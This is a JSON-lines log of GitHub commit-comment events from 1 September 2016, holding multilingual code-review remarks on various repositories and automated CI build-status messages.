{"id":"4502478370","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18863572,"position":15,"line":15,"path":"UserController.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-01T13:13:06Z","updated_at":"2016-09-01T13:13:06Z","body":"Es ovqer en ? Inchiya class-i mej pahvum es popoxakanner@?\r\nStex unes: List<User> userList "}},"created_at":"2016-09-01T13:13:06Z"}
{"id":"4502480658","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18863576,"position":20,"line":20,"path":"UserController.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-01T13:13:31Z","updated_at":"2016-09-01T13:13:31Z","body":"Imast chem qtnum es popoxakan@ pahelu stex"}},"created_at":"2016-09-01T13:13:31Z"}
{"id":"4502480684","type":"CommitCommentEvent","actor":{"login":"hillga"},"repo":{"name":"hillga/dojo_rules"},"payload":{"comment":{"id":18863577,"position":null,"line":null,"path":null,"commit_id":"d12d0fc41ac38f112e3b5b73ced2a8a2c538c775","created_at":"2016-09-01T13:13:31Z","updated_at":"2016-09-01T13:13:31Z","body":"hellllllllllllllllllllp\r\n"}},"created_at":"2016-09-01T13:13:31Z"}
{"id":"4502484326","type":"CommitCommentEvent","actor":{"login":"db483"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18863586,"position":50,"line":111,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T13:14:12Z","updated_at":"2016-09-01T13:14:12Z","body":"no need to use  Integer.toString here"}},"created_at":"2016-09-01T13:14:12Z"}
{"id":"4502484871","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18863587,"position":30,"line":30,"path":"UserController.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-01T13:14:17Z","updated_at":"2016-09-01T13:14:17Z","body":"Imast chem qtnum es popoxakanner@ pahelu stex"}},"created_at":"2016-09-01T13:14:17Z"}
{"id":"4502486104","type":"CommitCommentEvent","actor":{"login":"db483"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18863590,"position":69,"line":124,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T13:14:29Z","updated_at":"2016-09-01T13:14:29Z","body":"no need to use Integer.toString"}},"created_at":"2016-09-01T13:14:29Z"}
{"id":"4502487147","type":"CommitCommentEvent","actor":{"login":"db483"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18863591,"position":70,"line":125,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T13:14:40Z","updated_at":"2016-09-01T13:14:40Z","body":"no need to use Integer.toString"}},"created_at":"2016-09-01T13:14:40Z"}
{"id":"4502487498","type":"CommitCommentEvent","actor":{"login":"sakelum"},"repo":{"name":"sublimelk/git-int"},"payload":{"comment":{"id":18863594,"position":5,"line":5,"path":"about-us.php","commit_id":"158e39e6cdfee72e673123e9c56521912ae33bc5","created_at":"2016-09-01T13:14:44Z","updated_at":"2016-09-01T13:14:44Z","body":"Done"}},"created_at":"2016-09-01T13:14:44Z"}
{"id":"4502489306","type":"CommitCommentEvent","actor":{"login":"db483"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18863595,"position":73,"line":128,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T13:15:04Z","updated_at":"2016-09-01T13:15:04Z","body":"I'd use List instead of ArrayList"}},"created_at":"2016-09-01T13:15:04Z"}
{"id":"4502492078","type":"CommitCommentEvent","actor":{"login":"kurtov"},"repo":{"name":"Unact/sencha-common"},"payload":{"comment":{"id":18863599,"position":5,"line":26,"path":"common/src/lib/singletable/ViewController.js","commit_id":"59659f9355719f6b5b1a49c11c49ceac173eccc4","created_at":"2016-09-01T13:15:35Z","updated_at":"2016-09-01T13:15:35Z","body":"надо добавить коммент сюда https://github.com/Unact/sencha-common/blob/master/common/src/lib/grid/Panel.js"}},"created_at":"2016-09-01T13:15:35Z"}
{"id":"4502492586","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18863600,"position":103,"line":103,"path":"UserController.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-01T13:15:39Z","updated_at":"2016-09-01T13:15:39Z","body":"Qani vor user list@ unes du vorpes member. Inchiya es metod-in petq stanal ajd cucak@ vorpes parameter ?"}},"created_at":"2016-09-01T13:15:39Z"}
{"id":"4502494601","type":"CommitCommentEvent","actor":{"login":"inon84"},"repo":{"name":"inon84/inon"},"payload":{"comment":{"id":18863608,"position":null,"line":null,"path":null,"commit_id":"b729daa6bf554b2ae762efe51d12484c114a4e0e","created_at":"2016-09-01T13:16:00Z","updated_at":"2016-09-01T13:16:00Z","body":"added colors to messages echo\r\nreordered messages so they appear after the sudo"}},"created_at":"2016-09-01T13:16:00Z"}
{"id":"4502497790","type":"CommitCommentEvent","actor":{"login":"sandunsublime"},"repo":{"name":"sublimelk/git-int"},"payload":{"comment":{"id":18863613,"position":13,"line":13,"path":"gallery.php","commit_id":"9a172aacff5f0dc3884f89afbe8f27d5c5072a8d","created_at":"2016-09-01T13:16:36Z","updated_at":"2016-09-01T13:16:36Z","body":"Added title in gallery.php"}},"created_at":"2016-09-01T13:16:36Z"}
{"id":"4502498262","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18863615,"position":5,"line":466,"path":"resources/qml/Cura.qml","commit_id":"a2f478f2ad9df16e62f40406cf913957d3fac3f1","created_at":"2016-09-01T13:16:41Z","updated_at":"2016-09-01T13:16:41Z","body":"I was unsure about how QML would handle a default parameter in a method. So I played it safe and made it required everywhere.\r\n"}},"created_at":"2016-09-01T13:16:41Z"}
{"id":"4502499557","type":"CommitCommentEvent","actor":{"login":"lekma"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18863618,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T13:16:55Z","updated_at":"2016-09-01T13:16:55Z","body":"> I`m also confused - h265 uses less gpu % then h264 ...\r\n\r\nare you decoding from h264/mpeg2? If yes then you're only using vaapi for decode and sw for encode in h265 (which explain the lower gpu load)"}},"created_at":"2016-09-01T13:16:55Z"}
{"id":"4502500054","type":"CommitCommentEvent","actor":{"login":"db483"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18863619,"position":75,"line":130,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T13:17:01Z","updated_at":"2016-09-01T13:17:01Z","body":"is there a need for using an iterator here? you could just use:\r\nfor (String dataError : errorsEncountered) {\r\n                    LOG.info(\"processACHBatchDetails: \" + dataError);\r\n                }"}},"created_at":"2016-09-01T13:17:01Z"}
{"id":"4502501097","type":"CommitCommentEvent","actor":{"login":"db483"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18863621,"position":81,"line":136,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T13:17:14Z","updated_at":"2016-09-01T13:17:14Z","body":"no need for Integer.toString"}},"created_at":"2016-09-01T13:17:14Z"}
{"id":"4502505648","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18863631,"position":9,"line":9,"path":"UserRepoInterface.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-01T13:18:06Z","updated_at":"2016-09-01T13:18:06Z","body":"Aracharkum em lini: public void deleteUser(int userId)"}},"created_at":"2016-09-01T13:18:06Z"}
{"id":"4502507316","type":"CommitCommentEvent","actor":{"login":"hhhassan7"},"repo":{"name":"hhhassan7/hhhassan7"},"payload":{"comment":{"id":18863633,"position":null,"line":null,"path":null,"commit_id":"ac908ccac30c40752742e4bbf8424eb1b4e38761","created_at":"2016-09-01T13:18:24Z","updated_at":"2016-09-01T13:18:24Z","body":"hhhassan7"}},"created_at":"2016-09-01T13:18:24Z"}
{"id":"4502507893","type":"CommitCommentEvent","actor":{"login":"sedwards2009"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18863635,"position":4,"line":64,"path":"resources/qml/Preferences/ProfilesPage.qml","commit_id":"a2f478f2ad9df16e62f40406cf913957d3fac3f1","created_at":"2016-09-01T13:18:31Z","updated_at":"2016-09-01T13:18:31Z","body":"Yes, QML will chase those kinds of dependencies through a JS function too and automagic update things.\r\n"}},"created_at":"2016-09-01T13:18:31Z"}
{"id":"4502507915","type":"CommitCommentEvent","actor":{"login":"nicwillemse"},"repo":{"name":"rails/rails-observers"},"payload":{"comment":{"id":18863636,"position":null,"line":null,"path":null,"commit_id":"ba1c906475dac53bb24c51ccdb6ad8e7d0e71270","created_at":"2016-09-01T13:18:31Z","updated_at":"2016-09-01T13:18:31Z","body":"@rafaelfranca any idea when this will be released ? "}},"created_at":"2016-09-01T13:18:31Z"}
{"id":"4502508654","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18863638,"position":10,"line":10,"path":"UserRepoInterface.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-01T13:18:39Z","updated_at":"2016-09-01T13:18:39Z","body":"Aracharkum em lini: public User getUser(int userId)"}},"created_at":"2016-09-01T13:18:39Z"}
{"id":"4502508797","type":"CommitCommentEvent","actor":{"login":"lekma"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18863639,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T13:18:40Z","updated_at":"2016-09-01T13:18:40Z","body":"as you can see from vainfo there are no profiles associated with hevc/h265"}},"created_at":"2016-09-01T13:18:40Z"}
{"id":"4502512769","type":"CommitCommentEvent","actor":{"login":"Der-Eddy"},"repo":{"name":"Der-Eddy/discord_bot"},"payload":{"comment":{"id":18863648,"position":null,"line":null,"path":null,"commit_id":"990f4a2a991d76ca104c01cf7fc2f57066531aa5","created_at":"2016-09-01T13:19:24Z","updated_at":"2016-09-01T13:19:24Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5nJOyXJw&#x2F;20-flip-coins-for-the-random-command\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Flip coins for the random command</a>"}},"created_at":"2016-09-01T13:19:24Z"}
{"id":"4502512995","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18863649,"position":12,"line":12,"path":"UserRepoInterface.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-01T13:19:27Z","updated_at":"2016-09-01T13:19:27Z","body":"Aracharkum em lini: void editUser(User user).\r\nUser object-um arden nerarvatz a iserId-n"}},"created_at":"2016-09-01T13:19:27Z"}
{"id":"4502513165","type":"CommitCommentEvent","actor":{"login":"radiusjs"},"repo":{"name":"AtomsForPeace/gpwahlomat"},"payload":{"comment":{"id":18863651,"position":null,"line":null,"path":null,"commit_id":"a8e53bfe4ffb2309bad62542d799d28a69f80792","created_at":"2016-09-01T13:19:29Z","updated_at":"2016-09-01T13:19:29Z","body":"Also ich habe heute versucht die DB mit Hilfe von `python db_create.py` zu befüllen. Leider klappt es einfach bei mir nicht :-( \r\nDer Script wird ausgeführt aber die Datenbank bleibt leer. Fehlermeldung kommt leider keine.\r\n\r\nIch habe außerdem versucht die Datenbank zu löschen und durch den Aufruf  `python db_create.py` zu erstellen und zu befüllen. Das erstellen hat funktioniert aber nicht das befüllen mit den Daten aus der data.json.\r\n\r\nWie können wir das Problem lösen?"}},"created_at":"2016-09-01T13:19:29Z"}
{"id":"4502513180","type":"CommitCommentEvent","actor":{"login":"Delawen"},"repo":{"name":"geonetwork/core-geonetwork"},"payload":{"comment":{"id":18863652,"position":5,"line":50,"path":"web/src/main/webapp/xslt/common/error.xsl","commit_id":"682e02ce05602fc4a14fc07d6c0f6899156e0b74","created_at":"2016-09-01T13:19:29Z","updated_at":"2016-09-01T13:19:29Z","body":"Are we sure that removing <script will be enough?\r\n\r\nThis error messages will be full shown on the logfile. This is only for the UI. And probably not focused on being shown to common users, right? "}},"created_at":"2016-09-01T13:19:29Z"}
{"id":"4502514638","type":"CommitCommentEvent","actor":{"login":"db483"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18863654,"position":241,"line":347,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T13:19:45Z","updated_at":"2016-09-01T13:19:45Z","body":"might be better to return an empty String?"}},"created_at":"2016-09-01T13:19:45Z"}
{"id":"4502514860","type":"CommitCommentEvent","actor":{"login":"OjasA"},"repo":{"name":"lasa/website"},"payload":{"comment":{"id":18863655,"position":null,"line":null,"path":null,"commit_id":"2600316d60671caf209cca44fa9bf46a53ef551e","created_at":"2016-09-01T13:19:48Z","updated_at":"2016-09-01T13:19:48Z","body":"Do you know what font the text in the actual LASA crest is supposed to use?"}},"created_at":"2016-09-01T13:19:48Z"}
{"id":"4502515259","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863656,"position":null,"line":null,"path":null,"commit_id":"c26efbdf12da142ef8f15afcfb7d2b384169e14c","created_at":"2016-09-01T13:19:52Z","updated_at":"2016-09-01T13:19:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 878](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12180&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests passed: 189, ignored: 3; exit code 1 Build time: 00:07:27"}},"created_at":"2016-09-01T13:19:52Z"}
{"id":"4502519432","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18863661,"position":null,"line":null,"path":null,"commit_id":"b5cea5fa079ed7982ef63655db0d604070daf850","created_at":"2016-09-01T13:20:39Z","updated_at":"2016-09-01T13:20:39Z","body":"I was pondering... Since asymmetry is only used here, I think you might modify that concept (straight in `pawns.cpp`) instead of adding... `complexity` :-)"}},"created_at":"2016-09-01T13:20:39Z"}
{"id":"4502525598","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"LilitHayrapetyan/aca_homeworks"},"payload":{"comment":{"id":18863664,"position":21,"line":21,"path":"UserRepository.java","commit_id":"b29d4074ad33b6d347ffe6353a49438aaea8341d","created_at":"2016-09-01T13:21:48Z","updated_at":"2016-09-01T13:21:48Z","body":"Im kartziqov stex es popoxakanneri kariq@ chka. Stex aveli tramabanakana lini asenq file-eri hasceneri hamar naxatesvatz popoxakanner"}},"created_at":"2016-09-01T13:21:48Z"}
{"id":"4502525810","type":"CommitCommentEvent","actor":{"login":"LaurenzG"},"repo":{"name":"LaurenzG/Linodo"},"payload":{"comment":{"id":18863666,"position":null,"line":null,"path":null,"commit_id":"5cadd1bc3b08c0abc58ec8d4fd371b8ce137b0d8","created_at":"2016-09-01T13:21:50Z","updated_at":"2016-09-01T13:21:50Z","body":"#4 "}},"created_at":"2016-09-01T13:21:50Z"}
{"id":"4502526102","type":"CommitCommentEvent","actor":{"login":"Bogdan-G"},"repo":{"name":"Blood-Asp/GT5-Unofficial"},"payload":{"comment":{"id":18863667,"position":null,"line":null,"path":null,"commit_id":"b4049e88a269b5def8d3335aec566dcfc387a26b","created_at":"2016-09-01T13:21:54Z","updated_at":"2016-09-01T13:21:54Z","body":"taking away several checks so much faster? (in 1 func: -1x temp variable, -1x get, -1x null&size check)\r\nstrange as it seems to entanglement the code itself."}},"created_at":"2016-09-01T13:21:54Z"}
{"id":"4502526180","type":"CommitCommentEvent","actor":{"login":"aifrim"},"repo":{"name":"dexonline/dexonline"},"payload":{"comment":{"id":18863668,"position":57,"line":69,"path":"templates/admin/definitionEdit.tpl","commit_id":"87639168b1bb87a7aa236d9f2125e192de670c09","created_at":"2016-09-01T13:21:55Z","updated_at":"2016-09-01T13:21:55Z","body":"@CatalinFrancu \r\n\r\n1. Nu ar trebui să fie doar una din ele selectată?\r\n2. Nu ar trebui să le adaugi și textul? `<option value=\"{$e}\" selected>{$e}</option>`"}},"created_at":"2016-09-01T13:21:55Z"}
{"id":"4502548071","type":"CommitCommentEvent","actor":{"login":"Sobieck00"},"repo":{"name":"RasicN/random-test-values"},"payload":{"comment":{"id":18863715,"position":null,"line":null,"path":null,"commit_id":"901735c9f32a2e86fac3f03c44c120ce585def4d","created_at":"2016-09-01T13:25:52Z","updated_at":"2016-09-01T13:25:52Z","body":"Good find."}},"created_at":"2016-09-01T13:25:52Z"}
{"id":"4502548446","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18863718,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-01T13:25:56Z","updated_at":"2016-09-01T13:25:56Z","body":"yes (h264 source) this would explain this ;) \r\nIts a bit difficult to understand if you don't point it out that way ;)\r\nSo vaapi_hevc is hw enhanced even if the gpu don't support this (worth to mention this at the help text).![image](https://cloud.githubusercontent.com/assets/1355173/18168892/27b71998-7058-11e6-861d-e3dc2aeabe8b.png)"}},"created_at":"2016-09-01T13:25:56Z"}
{"id":"4502552215","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"lamozg6/homework10"},"payload":{"comment":{"id":18863725,"position":1,"line":1,"path":"src/Controller/Controller.java","commit_id":"b95a575ea75ec928e5640b6a3a8574e74546d65f","created_at":"2016-09-01T13:26:37Z","updated_at":"2016-09-01T13:26:37Z","body":"package-@ poqratarova sksvum"}},"created_at":"2016-09-01T13:26:37Z"}
{"id":"4502556380","type":"CommitCommentEvent","actor":{"login":"vahankhanikyan"},"repo":{"name":"lamozg6/homework10"},"payload":{"comment":{"id":18863734,"position":19,"line":19,"path":"src/Controller/Controller.java","commit_id":"b95a575ea75ec928e5640b6a3a8574e74546d65f","created_at":"2016-09-01T13:27:21Z","updated_at":"2016-09-01T13:27:21Z","body":"dataLayerinstance member@ ura?"}},"created_at":"2016-09-01T13:27:21Z"}
{"id":"4502557203","type":"CommitCommentEvent","actor":{"login":"khaiknievel"},"repo":{"name":"vollyimnetz/crop-thumbnails"},"payload":{"comment":{"id":18863735,"position":null,"line":null,"path":null,"commit_id":"a24ffea342a724040ae935b2b3b901497b4f181f","created_at":"2016-09-01T13:27:30Z","updated_at":"2016-09-01T13:27:30Z","body":"Cheers :)"}},"created_at":"2016-09-01T13:27:30Z"}
{"id":"4502557397","type":"CommitCommentEvent","actor":{"login":"aviebke"},"repo":{"name":"Scrivito/scrivito_advanced_editors"},"payload":{"comment":{"id":18863736,"position":7,"line":32,"path":"README.md","commit_id":"01bfdf331383d01cc7a5e6a14cae48bb8441ef63","created_at":"2016-09-01T13:27:32Z","updated_at":"2016-09-01T13:27:32Z","body":"There is a view for tabs now which is used if the editing view is small. It enhances the usability of the Content Browser and makes editing on mobile devices easier.\r\nTabs can now be arranged vertically. Just add `class='tab-list vertical'` to your tab list."}},"created_at":"2016-09-01T13:27:32Z"}
{"id":"4502557648","type":"CommitCommentEvent","actor":{"login":"kozmaz87"},"repo":{"name":"ebu/ebu-tt-live-toolkit"},"payload":{"comment":{"id":18863737,"position":null,"line":null,"path":null,"commit_id":"fe8a4a9dc3305aea1e7376b4430d4eb61da1ed96","created_at":"2016-09-01T13:27:35Z","updated_at":"2016-09-01T13:27:35Z","body":"oh my I will take a look at some point. I remember having a headache about pyxb and anyType. Unfortunately some elements don't pass the any check of pyxb\r\n"}},"created_at":"2016-09-01T13:27:35Z"}
{"id":"4502562131","type":"CommitCommentEvent","actor":{"login":"modocache"},"repo":{"name":"SwiftWeekly/swiftweekly.github.io"},"payload":{"comment":{"id":18863746,"position":8,"line":9,"path":"_drafts/2016-09-01-issue-36.md","commit_id":"9bae5527cc28237acd182d03164a6e43edb5d879","created_at":"2016-09-01T13:28:22Z","updated_at":"2016-09-01T13:28:22Z","body":"![giphy 3](https://cloud.githubusercontent.com/assets/552921/18169018/69a5d4f2-7026-11e6-9751-db292dc4ab07.gif)\r\n"}},"created_at":"2016-09-01T13:28:22Z"}
{"id":"4502564114","type":"CommitCommentEvent","actor":{"login":"aviebke"},"repo":{"name":"Scrivito/scrivito_advanced_editors"},"payload":{"comment":{"id":18863750,"position":16,"line":204,"path":"README.md","commit_id":"01bfdf331383d01cc7a5e6a14cae48bb8441ef63","created_at":"2016-09-01T13:28:43Z","updated_at":"2016-09-01T13:28:43Z","body":"Only -> Simply\r\ntab-list -> tab list"}},"created_at":"2016-09-01T13:28:43Z"}
{"id":"4502570419","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18863766,"position":null,"line":null,"path":null,"commit_id":"884b30274885f15d4e7f1f42e8b058f2d1e986e6","created_at":"2016-09-01T13:29:50Z","updated_at":"2016-09-01T13:29:50Z","body":"TeamCity libpalaso :: palaso-win32-master Continuous [Build 3.0.757.884b30274885f15d4e7f1f42e8b058f2d1e986e6](http://build.palaso.org/viewLog.html?buildId=76307&buildTypeId=bt223) outcome was **SUCCESS**\nSummary: Tests passed: 3490, ignored: 126 Build time: 00:08:45"}},"created_at":"2016-09-01T13:29:50Z"}
{"id":"4502572698","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":18863771,"position":null,"line":null,"path":null,"commit_id":"884b30274885f15d4e7f1f42e8b058f2d1e986e6","created_at":"2016-09-01T13:30:16Z","updated_at":"2016-09-01T13:30:16Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.757.884b30274885f15d4e7f1f42e8b058f2d1e986e6](http://build.palaso.org/viewLog.html?buildId=76308&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:09:04"}},"created_at":"2016-09-01T13:30:16Z"}
{"id":"4502574871","type":"CommitCommentEvent","actor":{"login":"mk-f"},"repo":{"name":"mkschreder/orangerpcd"},"payload":{"comment":{"id":18863776,"position":null,"line":null,"path":null,"commit_id":"ea57d5be8d2d14f792f80c67cd531340986bac18","created_at":"2016-09-01T13:30:37Z","updated_at":"2016-09-01T13:30:37Z","body":"Thanks for the heads up, that could in fact fix the issue. I tried 2.16.08 yesterday which also segfaults with out the patch. Nevertheless it would be interesting to know what causes the instability on uClibc, as `pthread_attr_setstacksize` just sets _the minimum size_ for new threads."}},"created_at":"2016-09-01T13:30:37Z"}
{"id":"4502577516","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system-reference-page"},"payload":{"comment":{"id":18863778,"position":null,"line":null,"path":null,"commit_id":"f1294569e07141b588c28567e3cc1ca523c81a3d","created_at":"2016-09-01T13:31:02Z","updated_at":"2016-09-01T13:31:02Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/354/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1690)."}},"created_at":"2016-09-01T13:31:02Z"}
{"id":"4502582002","type":"CommitCommentEvent","actor":{"login":"CatalinFrancu"},"repo":{"name":"dexonline/dexonline"},"payload":{"comment":{"id":18863785,"position":57,"line":69,"path":"templates/admin/definitionEdit.tpl","commit_id":"87639168b1bb87a7aa236d9f2125e192de670c09","created_at":"2016-09-01T13:31:50Z","updated_at":"2016-09-01T13:31:50Z","body":"Nu, acele selecturi permit valori multiple. Valorile tipărite în `foreach` sunt doar ID-uri, iar restul informației o încarcă Select2 prin Ajax, în `wwwbase/js/autoload/definitionEdit.js`. Pentru detalii, vezi funcția `initSelect2` din `wwwbase/js/select2Dev.js`."}},"created_at":"2016-09-01T13:31:50Z"}
{"id":"4502585546","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863797,"position":null,"line":null,"path":null,"commit_id":"075221628bdc39f9705b5279a02ec051ad41ced2","created_at":"2016-09-01T13:32:29Z","updated_at":"2016-09-01T13:32:29Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 879](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12193&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T13:32:29Z"}
{"id":"4502590914","type":"CommitCommentEvent","actor":{"login":"rahul1aggarwal"},"repo":{"name":"jiocloudDSS/dsskms"},"payload":{"comment":{"id":18863805,"position":53,"line":53,"path":"src/org/kms/core/MKRequester.java","commit_id":"141a85c7e09315296d9884dc79d7cf08b0c822d6","created_at":"2016-09-01T13:33:27Z","updated_at":"2016-09-01T13:33:27Z","body":"CryptoMain should have a function decryptWithGlobalKey to avoid fetching the global key from anywhere"}},"created_at":"2016-09-01T13:33:27Z"}
{"id":"4502592977","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863807,"position":null,"line":null,"path":null,"commit_id":"075221628bdc39f9705b5279a02ec051ad41ced2","created_at":"2016-09-01T13:33:49Z","updated_at":"2016-09-01T13:33:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 879](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12193&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:01:20"}},"created_at":"2016-09-01T13:33:49Z"}
{"id":"4502592985","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18863808,"position":null,"line":null,"path":null,"commit_id":"96d1220a31ae739cda6d64d88bf8bb0fe566c32e","created_at":"2016-09-01T13:33:49Z","updated_at":"2016-09-01T13:33:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 880](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12194&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T13:33:49Z"}
{"id":"4502596505","type":"CommitCommentEvent","actor":{"login":"rahul1aggarwal"},"repo":{"name":"jiocloudDSS/dsskms"},"payload":{"comment":{"id":18863819,"position":64,"line":64,"path":"src/org/kms/core/MKRequester.java","commit_id":"141a85c7e09315296d9884dc79d7cf08b0c822d6","created_at":"2016-09-01T13:34:27Z","updated_at":"2016-09-01T13:34:27Z","body":"same here"}},"created_at":"2016-09-01T13:34:27Z"}
{"id":"4502601076","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18863830,"position":null,"line":null,"path":null,"commit_id":"d1aa30dd975ff8df31e2bea589b5503ce8141187","created_at":"2016-09-01T13:35:17Z","updated_at":"2016-09-01T13:35:17Z","body":"os_2_0_develop (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d1aa30dd975ff8df31e2bea589b5503ce8141187-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-d1aa30dd975ff8df31e2bea589b5503ce8141187-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-01T13:35:17Z"}
